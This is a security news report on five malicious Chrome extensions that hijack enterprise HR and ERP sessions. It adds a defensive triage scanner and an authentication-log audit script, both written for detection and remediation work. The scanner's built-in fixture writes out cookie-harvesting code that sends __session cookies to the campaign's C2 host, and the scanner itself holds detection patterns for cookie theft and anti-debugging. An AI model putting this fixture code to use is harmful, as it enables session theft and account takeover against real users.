Five Malicious Chrome Extensions Target Enterprise HR and ERP Platforms for Full Account Takeover
The extensions have collectively reached over 2,300 users and employ complementary attack mechanisms to steal authentication tokens, block incident response capabilities, and enable complete account takeover through session hijacking.
Four extensions operate under the publisher name databycloud1104, while the fifth uses different branding (softwareaccess) but shares identical infrastructure patterns.
The extensions masquerade as productivity tools promising streamlined access to enterprise platforms and multi-account management.
All five request standard permissions that appear legitimate during installation, with privacy policies falsely claiming no data collection despite implementing comprehensive credential theft mechanisms.
The extensions show signs of active maintenance, with version numbers that have progressed across releases and new capabilities added along the way.
Data By Cloud 2 (v3.3) has the most extensive distribution, with 1,000 users, and blocks 56 administrative pages, 27% more than Tool Access 11 (v1.4).
Data By Cloud 1 (v3.2) adds anti-debugging capabilities, while Software Access (v1.4) implements bidirectional cookie manipulation for direct session hijacking.
The campaign deploys three distinct attack types working in concert. Cookie exfiltration extensions extract session authentication tokens and transmit them to remote servers every 60 seconds via encrypted command-and-control channels.
The extensions implement persistent monitoring via cookie change listeners and alarms that verify the login state, ensuring that threat actors maintain current credentials even as users reauthenticate during everyday workflows.
DOM manipulation extensions block access to administrative interfaces by erasing page content and redirecting to malformed URLs.
Tool Access 11 targets 44 pages, including authentication management, security policy configuration, and session controls.
Data By Cloud 2 expands this to 56 pages by adding password changes, account deactivation, 2FA device management, and security audit log access.
The extensions use MutationObservers, backed by a 50-millisecond re-check, to re-apply the blocking whenever page content changes, so it holds even in single-page applications that update the DOM without a full page load.
Software Access implements the most sophisticated attack through bidirectional cookie manipulation.
The extension both exfiltrates authentication tokens and receives stolen cookies from its command-and-control server, then injects them into the browser using chrome.cookies.set() to enable direct session hijacking.
Because an injected cookie represents a session that has already passed authentication, the threat actor never enters a password or completes a multi-factor challenge: the application simply treats the attacker's browser as the victim's.
The extensions include identical lists of 23 security-focused Chrome extensions they monitor for presence, including EditThisCookie, Cookie-Editor, ModHeader, Redux DevTools, and SessionBox.
The chrome.management API enumerates installed extensions and reports the findings to command-and-control servers, allowing threat actors to assess whether security tools might interfere with credential theft.
Data By Cloud 1 and Software Access incorporate the DisableDevtool library to prevent code inspection through browser developer tools.
The library detects modifications to RegExp.prototype.toString(), property inspection, window size comparisons, and performance timing analysis to identify debugging attempts.
Software Access adds password field protection that prevents users from changing input types to inspect credential values, reverting any such attempts within one second.
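The behaviours described in the preceding paragraphs (cookie harvesting on alarms and cookie-change listeners, chrome.cookies.set() injection, DOM wiping with MutationObservers, extension enumeration through chrome.management, and the bundled DisableDevtool library) all leave recognisable marks in an extension's manifest and source. The following Node.js script is an added example, not code from Socket or from the extensions themselves: it triages an unpacked extension for those marks and for the identifiers in the IOC table below. The indicator weights and verdict thresholds are a heuristic chosen for this example, and the sample extension it ships with is a constructed fixture, not the real extension source.

```javascript
// Added example, not code from Socket or from the extensions themselves: static
// triage of an unpacked Chrome extension for the behaviours described above.
// Input is a map { relativePath: fileContents } so constructed samples can be
// checked in memory; loadUnpackedExtension() builds the same map from disk.

// Values taken from the report's IOC table.
const KNOWN_C2_HOSTS = ["api.databycloud.com", "api.software-access.com"];
const KNOWN_BAD_EXTENSION_IDS = new Set([
  "oldhjammhkghhahhhdcifmmlefibciph", "ijapakghdgckgblfgjobhcfglebbkebf",
  "makdmacamkifdldldlelollkkjnoiedg", "mbjjeombjeklkbndcjgmfcdhfbjngcam",
  "bmodapcihjhklpogdpblefpepjolaoij",
]);

// Source-level indicators; the weights are a triage heuristic chosen for this example.
const CODE_INDICATORS = [
  { id: "cookie-read",     weight: 1, re: /chrome\.cookies\.(get|getAll)\s*\(/,         why: "reads browser cookies" },
  { id: "cookie-write",    weight: 3, re: /chrome\.cookies\.set\s*\(/,                  why: "writes cookies (possible session injection)" },
  { id: "cookie-listener", weight: 2, re: /chrome\.cookies\.onChanged\.addListener/,    why: "re-harvests on every cookie change" },
  { id: "alarm",           weight: 1, re: /chrome\.alarms\.create\s*\(/,                why: "periodic background task" },
  { id: "ext-enum",        weight: 2, re: /chrome\.management\.getAll\s*\(/,            why: "enumerates installed extensions" },
  { id: "dom-wipe",        weight: 2, re: /document\.body\.innerHTML\s*=\s*(""|''|``)/, why: "erases page content" },
  { id: "mutation-obs",    weight: 1, re: /new\s+MutationObserver\s*\(/,                why: "watches the DOM to re-apply blocking" },
  { id: "anti-debug",      weight: 2, re: /DisableDevtool|disable-devtool/i,            why: "bundles DisableDevtool anti-debugging" },
  { id: "session-cookie",  weight: 2, re: /["'`]__session["'`]/,                        why: "targets the __session cookie" },
  { id: "websocket",       weight: 1, re: /new\s+WebSocket\s*\(\s*["'`]wss?:\/\//,      why: "opens a WebSocket channel" },
];
const RISKY_PERMISSIONS = { cookies: 2, management: 2, alarms: 1, scripting: 1, webRequest: 1 };

function triageExtension(files, extensionId) {
  const findings = [];
  const add = (file, id, weight, why) => findings.push({ file, id, weight, why });
  if (extensionId && KNOWN_BAD_EXTENSION_IDS.has(extensionId)) {
    add("-", "known-id", 10, `extension ID ${extensionId} is in the published IOC list`);
  }
  if (!files["manifest.json"]) throw new Error("manifest.json missing");
  const manifest = JSON.parse(files["manifest.json"]);
  const perms = new Set([...(manifest.permissions || []), ...(manifest.optional_permissions || [])]);
  for (const [perm, weight] of Object.entries(RISKY_PERMISSIONS)) {
    if (perms.has(perm)) add("manifest.json", `perm-${perm}`, weight, `requests "${perm}" permission`);
  }
  const hosts = manifest.host_permissions || [];
  if (hosts.some((h) => h === "<all_urls>" || h.startsWith("*://*/"))) {
    add("manifest.json", "all-hosts", 2, "host permission covers every site");
  }
  for (const [name, text] of Object.entries(files)) {
    if (!name.endsWith(".js")) continue;
    for (const ind of CODE_INDICATORS) if (ind.re.test(text)) add(name, ind.id, ind.weight, ind.why);
    for (const host of KNOWN_C2_HOSTS) if (text.includes(host)) add(name, "known-c2", 10, `references published C2 host ${host}`);
  }
  const ids = new Set(findings.map((f) => f.id));
  const score = findings.reduce((s, f) => s + f.weight, 0);
  let verdict = "low";
  if (ids.has("known-id") || ids.has("known-c2")) verdict = "known-bad";
  // Cookie writes plus a network channel or change listener is the hijack shape
  // the report describes; legitimate cookie editors also land here, so "high"
  // means "review by hand", not "malicious".
  else if ((ids.has("cookie-write") && (ids.has("websocket") || ids.has("cookie-listener"))) || score >= 6) verdict = "high";
  else if (score >= 3) verdict = "medium";
  return { verdict, score, findings };
}

// Read an unpacked extension directory (manifest.json and every .js file, nested
// folders included) into the { path: contents } shape triageExtension() expects.
function loadUnpackedExtension(dir) {
  const fs = require("node:fs"), path = require("node:path");
  const files = {};
  const walk = (sub) => {
    for (const ent of fs.readdirSync(path.join(dir, sub), { withFileTypes: true })) {
      const rel = path.join(sub, ent.name);
      if (ent.isDirectory()) walk(rel);
      else if (rel === "manifest.json" || rel.endsWith(".js")) files[rel] = fs.readFileSync(path.join(dir, rel), "utf8");
    }
  };
  walk("");
  return files;
}

// Constructed fixture modelled on the report's description, not the real extension source.
const SAMPLE_EXTENSION = {
  "manifest.json": JSON.stringify({
    manifest_version: 3, name: "Example Access Tool", version: "1.0",
    permissions: ["cookies", "alarms", "management", "storage"], host_permissions: ["<all_urls>"],
    background: { service_worker: "background.js" },
    content_scripts: [{ matches: ["*://*.workdaysuv.com/*"], js: ["content.js"] }],
  }),
  "background.js": [
    'chrome.alarms.create("sync", { periodInMinutes: 1 });',
    'async function harvest() {',
    '  const cookies = await chrome.cookies.getAll({ name: "__session" });',
    '  await fetch("https://api.databycloud.com/api/v1/mv3", { method: "POST", body: JSON.stringify(cookies) });',
    '}',
    'chrome.alarms.onAlarm.addListener(harvest);',
    'chrome.cookies.onChanged.addListener(harvest);',
    'chrome.management.getAll((exts) => exts.map((e) => e.name));',
  ].join("\n"),
  "content.js": [
    'const wipe = () => { if (location.pathname.includes("/security")) document.body.innerHTML = ""; };',
    'new MutationObserver(wipe).observe(document.documentElement, { childList: true, subtree: true });',
    'setInterval(wipe, 50);',
  ].join("\n"),
};

if (typeof require !== "undefined" && require.main === module) {
  const [dir, id] = process.argv.slice(2);
  const result = dir ? triageExtension(loadUnpackedExtension(dir), id) : triageExtension(SAMPLE_EXTENSION);
  console.log(JSON.stringify(result, null, 2));
}
```

Run it with no arguments to triage the built-in fixture, or as `node triage.js <unpacked-extension-dir> [extension-id]` against a real extension copied out of the Chrome profile's Extensions folder. A "known-bad" verdict only fires on the published IOCs; everything else is a prioritisation signal for manual review, since a genuine cookie manager such as EditThisCookie legitimately reads and writes cookies and would score "high" here too.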
The coordinated deployment creates a persistent account compromise that survives standard incident response procedures.
Security teams can detect unauthorized access through SIEM alerts or authentication anomalies, but every standard remediation action is blocked in any browser that is running the extensions.
Organizations face containment failure scenarios where administrators cannot rotate credentials, deactivate accounts, remove trusted devices, or modify security policies from an affected browser, because the extensions intercept and block these functions.
The campaign targets Workday’s sandbox environment (workdaysuv.com) explicitly, which is used for testing security configuration changes before production deployment.
By blocking security pages in the sandbox, the extensions prevent validation of password policy changes, authentication updates, or other security improvements, forcing organizations to either deploy untested changes directly to production or abandon security improvements entirely.
Users should immediately remove matching extensions, review authentication history for unexpected access, and perform password resets from clean systems.
Chrome sync settings must be turned off on all devices before removal to prevent reinstallation.
Security teams should implement Chrome Enterprise extension allowlists to prevent unauthorized installations and block identified command-and-control domains via web proxy or DNS filtering.
Authentication logs require auditing for simultaneous sessions from multiple IPs or geographically inconsistent access patterns.
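The audit recommended above, as an added example that is not from the report or from Socket: three checks run over a constructed JSON-lines sample of sign-on and activity records. The record shape (time, user, session, ip, country, event) is an assumption; map it to your identity provider's export or to Workday's sign-on reports. The session-replay check is the one that catches injected-cookie hijacking specifically: a replayed __session cookie creates no new login event, but the existing session suddenly appears from a second source IP. The other two checks implement the "simultaneous sessions from multiple IPs" and "geographically inconsistent access" signals from the text, with a deliberately crude country-change-within-N-minutes rule standing in for a proper travel-velocity calculation.

```javascript
// Added example, not from the report or from Socket: audit sign-on/activity
// logs for the patterns the text recommends. Records are constructed JSON
// lines; the field names are an assumed export shape.
const SAMPLE_AUTH_LOG = `
{"time":"2025-10-01T08:00:00Z","user":"alice","session":"s1","ip":"203.0.113.10","country":"US","event":"login"}
{"time":"2025-10-01T08:05:00Z","user":"alice","session":"s1","ip":"203.0.113.10","country":"US","event":"request"}
{"time":"2025-10-01T08:20:00Z","user":"alice","session":"s1","ip":"198.51.100.7","country":"NL","event":"request"}
{"time":"2025-10-01T08:40:00Z","user":"alice","session":"s1","ip":"203.0.113.10","country":"US","event":"request"}
{"time":"2025-10-01T09:30:00Z","user":"bob","session":"s2","ip":"203.0.113.25","country":"US","event":"login"}
{"time":"2025-10-01T10:00:00Z","user":"bob","session":"s3","ip":"203.0.113.25","country":"US","event":"login"}
{"time":"2025-10-01T10:15:00Z","user":"bob","session":"s3","ip":"203.0.113.25","country":"US","event":"request"}
{"time":"2025-10-01T11:00:00Z","user":"carol","session":"s4","ip":"192.0.2.9","country":"DE","event":"login"}
{"time":"2025-10-01T11:30:00Z","user":"carol","session":"s5","ip":"192.0.2.77","country":"DE","event":"login"}
`;

// Parse JSON lines into records with a numeric timestamp, oldest first.
function parseAuthLog(text) {
  return text.split("\n").filter((l) => l.trim())
    .map((l) => { const r = JSON.parse(l); return { ...r, t: Date.parse(r.time) }; })
    .sort((a, b) => a.t - b.t);
}

function groupBy(records, key) {
  const m = new Map();
  for (const r of records) { if (!m.has(r[key])) m.set(r[key], []); m.get(r[key]).push(r); }
  return m;
}

// 1. One session identifier used from more than one source IP. A replayed
//    __session cookie produces exactly this: no new login event, but the
//    existing session is suddenly active from the attacker's address too.
function findSessionReplay(records) {
  const out = [];
  for (const [session, recs] of groupBy(records, "session")) {
    const ips = [...new Set(recs.map((r) => r.ip))];
    if (ips.length > 1) out.push({ type: "session-replay", user: recs[0].user, session, ips });
  }
  return out;
}

// 2. Same user seen from two countries closer together in time than travel
//    allows. A country change within `windowMinutes` is a crude stand-in for
//    a distance/velocity calculation against IP geolocation.
function findImpossibleTravel(records, windowMinutes = 60) {
  const out = [];
  for (const [user, recs] of groupBy(records, "user")) {
    for (let i = 1; i < recs.length; i++) {
      const prev = recs[i - 1], cur = recs[i];
      const minutes = (cur.t - prev.t) / 60000;
      if (prev.country !== cur.country && minutes <= windowMinutes) {
        out.push({ type: "impossible-travel", user, from: prev.country, to: cur.country, minutes });
      }
    }
  }
  return out;
}

// 3. Two distinct sessions for one user active at the same time from different
//    IPs. A session counts as active from its first record until its logout
//    event, or `idleMinutes` after its last record when no logout is seen.
function findConcurrentSessions(records, idleMinutes = 60) {
  const out = [];
  for (const [user, recs] of groupBy(records, "user")) {
    const sessions = [...groupBy(recs, "session")].map(([session, srecs]) => {
      const last = srecs[srecs.length - 1];
      const end = last.event === "logout" ? last.t : last.t + idleMinutes * 60000;
      return { session, start: srecs[0].t, end, ips: new Set(srecs.map((r) => r.ip)) };
    });
    for (let i = 0; i < sessions.length; i++) {
      for (let j = i + 1; j < sessions.length; j++) {
        const a = sessions[i], b = sessions[j];
        const overlap = a.start <= b.end && b.start <= a.end;
        const sharesIp = [...a.ips].some((ip) => b.ips.has(ip));
        if (overlap && !sharesIp) out.push({ type: "concurrent-sessions", user, sessions: [a.session, b.session] });
      }
    }
  }
  return out;
}

function auditAuthLog(text) {
  const records = parseAuthLog(text);
  return [...findSessionReplay(records), ...findImpossibleTravel(records), ...findConcurrentSessions(records)];
}

if (typeof require !== "undefined" && require.main === module) {
  const text = process.argv[2] ? require("node:fs").readFileSync(process.argv[2], "utf8") : SAMPLE_AUTH_LOG;
  console.log(JSON.stringify(auditAuthLog(text), null, 2));
}
```

On the sample, alice's session s1 is flagged as replayed (it appears from both a US and an NL address with no second login), her US/NL/US hops inside 20 minutes are flagged as impossible travel, and carol's two overlapping sessions from different IPs are flagged as concurrent; bob's two sessions from the same address are left alone, which is the usual "opened a second tab" case. Pass a JSON-lines file as the first argument to run the same checks over a real export.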
Socket's researchers also advise validating policy deployment status across endpoints, since restrictions on browser extensions can interfere with administrative configuration workflows, as outlined in browser security policy management documentation.
| Indicator Type | Value | Notes |
|---|---|---|
| Publisher Name | databycloud1104 | Registered for four extensions |
| Publisher Email | admin@databycloud.com | Associated with databycloud1104 |
| Publisher Name | softwareaccess | Registered for one extension |
| Publisher Email | softwareaccess0908@gmail.com | Associated with softwareaccess |
| Extension ID | oldhjammhkghhahhhdcifmmlefibciph | DataByCloud Access v1.6 |
| Extension ID | ijapakghdgckgblfgjobhcfglebbkebf | Tool Access 11 v1.4 |
| Extension ID | makdmacamkifdldldlelollkkjnoiedg | Data By Cloud 2 v3.3 |
| Extension ID | mbjjeombjeklkbndcjgmfcdhfbjngcam | Data By Cloud 1 v3.2 |
| Extension ID | bmodapcihjhklpogdpblefpepjolaoij | Software Access v1.4 |
| C2 Domain | api.databycloud.com | Cookie exfiltration endpoint |
| C2 Path | /api/v1/mv3 | MV3 manifest version indicator |
| C2 Domain | api.software-access.com | Bidirectional C2 infrastructure |
| WebSocket | wss://api.software-access.com | Real-time communication |
| Target Cookie | __session | Authentication token name |
| Blocked Domain | workdaysuv.com | Workday sandbox environment |
The campaign maps to MITRE ATT&CK techniques T1539 (Steal Web Session Cookie), T1185 (Browser Session Hijacking), T1176.001 (Browser Extensions), T1027 (Obfuscated Files or Information), and T1562.001 (Disable or Modify Tools).
| Technique ID | Technique Name |
|---|---|
| T1539 | Steal Web Session Cookie |
| T1185 | Browser Session Hijacking |
| T1176.001 | Browser Extensions |
| T1027 | Obfuscated Files or Information |
| T1562.001 | Disable or Modify Tools |
All five extensions remain under investigation with takedown requests submitted to Google’s Chrome Web Store security team.
Similar patterns targeting other enterprise platforms should be anticipated as the threat actor maintains disposable infrastructure and complementary capabilities across multiple publisher identities.
The post Five Malicious Chrome Extensions Target Enterprise HR and ERP Platforms for Full Account Takeover appeared first on Cyber Security News.